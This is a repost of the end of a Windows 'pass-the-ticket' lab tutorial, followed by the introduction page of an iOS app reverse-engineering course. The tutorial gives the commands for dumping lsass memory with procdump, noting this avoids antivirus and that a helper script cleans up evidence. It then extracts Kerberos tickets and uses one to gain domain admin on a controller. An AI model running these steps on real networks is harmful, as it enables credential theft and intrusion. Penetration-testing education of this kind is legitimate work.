- autoProc.py (not required, but useful): wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

- dc01.winlab.com (domain controller)
- client01.winlab.com (generic server)

And two domain accounts:

- Administrator (domain admin)
- User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com. A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz. This can be done by uploading procdump64.exe to the target host and then running:

procdump64.exe -accepteula -ma lsass.exe output-file

Alternatively we can use autoProc.py, which automates all of this as well as cleans up the evidence (if using this method, make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107):

python3 autoProc.py domain/user@target

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

And view the available tickets. Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account!

The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

kirbi2ccache input.kirbi output.ccache

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct:

export KRB5CCNAME=/path/to/.ccache
klist

We must specify the target host by its fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller:

wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

Excellent!
We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

- https://www.tarlogic.com/en/blog/how-kerberos-works/
- https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

- Impacket
- gentilkiwi
- harmj0y
- SkelSec
- knavesec

Sursa: https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
25. Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest in application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂

All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store.

This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success.

This is my first attempt at creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b!

If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn!

Version: 1.1

Modules

- Prerequisites
- Introduction
- Module 1 - Environment Setup
- Module 2 - Decrypting iOS Applications
- Module 3 - Static Analysis
- Module 4 - Dynamic Analysis and Hacking
- Module 5 - Binary Patching
- Final Thoughts
- Resources

EPUB Download

Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia 🙏🏼.

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Donations

I don't really accept donations because I do this to share what I learn with the community. If you want to support me, just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer; all the comments and opinions are my own.

Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on GitHub, that's the privacy policy you want to read.

[^1]: I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users.

Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps